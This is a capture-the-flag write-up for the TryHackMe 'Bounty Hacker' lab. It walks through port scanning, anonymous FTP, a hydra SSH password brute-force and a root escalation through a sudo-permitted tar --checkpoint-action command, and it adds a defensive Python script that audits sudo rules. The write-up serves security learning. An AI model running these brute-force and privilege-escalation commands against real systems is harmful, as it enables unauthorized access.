TryHackMe — Bounty Hacker

Having fun with TryHackMe again. So, here is the write-up and guide to pass the Bounty Hacker challenge.

Room: https://tryhackme.com/room/cowboyhacker
Level: Easy

Task: You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Let's get started.

As usual, start the machine and open the IP in a browser.

There is a message but nothing special here. “Who wrote the task list?” I randomly test Jet and Ein but it's not the correct one. Never mind, try rustscan then,

# rustscan -a 10.10.192.X -u 5000 -- -sV -T4 -A
Open 10.10.192.X:21
Open 10.10.192.X:22
Open 10.10.192.X:80
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
...
...
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
...
...
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
...
...

There are 3 ports open and FTP allows anonymous login. Using Cyberduck,

There are 2 files available.

The task.txt says

1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-XXX

locks.txt says

rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e

Hmm.. looks like a password dict to me.. If the task list is written by XXX, then I can use it as the SSH user. Let's try brute forcing using the dict locks.txt

# hydra -l XXX -P ~/Downloads/locks.txt 10.10.192.X ssh              
.....
.....
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.192.X:22/
[22][ssh] host: 10.10.192.X login: XXX password: XXXXXXXXXXXXXXXXX
1 of 1 target successfully completed, 1 valid password found
.....
.....

OK, that was easy. Let's SSH in.

# ssh XXX@10.10.192.X                                  
XXX@10.10.192.X's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
Last login: Wed Apr 7 01:22:53 2021 from 10.8.163.74
XXX@bountyhacker:~/Desktop$

Alright, successfully entered the dungeon. Hehe..

# ls
user.txt
# cat user.txt
THM{XXXXXXXXXXXXXXXX}

Found the user flag. Now let's go for root. The first thing is to check which commands the invoking user is allowed to run with sudo.

# sudo -l
[sudo] password for XXX:
Matching Defaults entries for XXX on bountyhacker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar

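Referring to GTFOBins, tar's --checkpoint-action=exec option runs an arbitrary command at each checkpoint, and because sudo runs tar as root, the following command immediately gives you a root shell.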

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
#
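
From the defender's side, the (root) /bin/tar rule above is the kind of sudoers entry to catch in review. The following is an added example, not part of the original write-up: it parses sudo -l output and flags rules for binaries that can run other programs. The SHELL_CAPABLE set and the audit_sudo_l name are assumptions of this example.

```python
import os
import re

# Non-exhaustive sample of binaries GTFOBins lists as able to spawn other
# commands; this set is an assumption of the example, extend it after review.
SHELL_CAPABLE = {"tar", "find", "vim", "less", "awk", "man", "env", "perl", "python3"}

# The `sudo -l` output from this write-up (Defaults line shortened).
SAMPLE = """\
Matching Defaults entries for XXX on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin
User lin may run the following commands on bountyhacker:
    (root) /bin/tar
"""

# "(runas) [TAG: ...] cmd[, cmd...]" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def audit_sudo_l(text):
    """Return (runas, command, reason) for each rule worth a manual review."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # headers and Defaults lines
        runas, _tags, cmds = m.groups()
        # Commands are comma separated; "\," is a literal comma in an argument.
        for cmd in filter(None, re.split(r"(?<!\\),\s*", cmds.strip())):
            path, *args = cmd.split()
            if path == "ALL":
                findings.append((runas, cmd, "unrestricted command set"))
            # A rule ending in "" permits the command only without arguments.
            elif os.path.basename(path) in SHELL_CAPABLE and args != ['""']:
                reason = "fixed arguments, review them" if args else "any arguments allowed"
                findings.append((runas, cmd, f"can run other programs; {reason}"))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_l(SAMPLE):
        print(f"[!] as {runas}: {cmd} -> {reason}")
```

A rule that names a wrapper script with fixed behaviour, or pins the command to no arguments, would not be flagged; the bare /bin/tar rule is.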

Alright then,

# ls -al /root
total 40
drwx------ 5 root root 4096 Jun 7 2020 .
drwxr-xr-x 24 root root 4096 Jun 6 2020 ..
-rw------- 1 root root 2694 Jun 7 2020 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwx------ 2 root root 4096 Feb 26 2019 .cache
drwxr-xr-x 2 root root 4096 Jun 7 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 19 Jun 7 2020 root.txt
-rw-r--r-- 1 root root 66 Jun 7 2020 .selected_editor
drwx------ 2 root root 4096 Jun 7 2020 .ssh
# cat /root/root.txt
THM{XXXXXXXXXXXXXXX}

Done! Easy Peasy!

~~~ Happy Hacking ~~~

Software Engineer at Teratotech.com
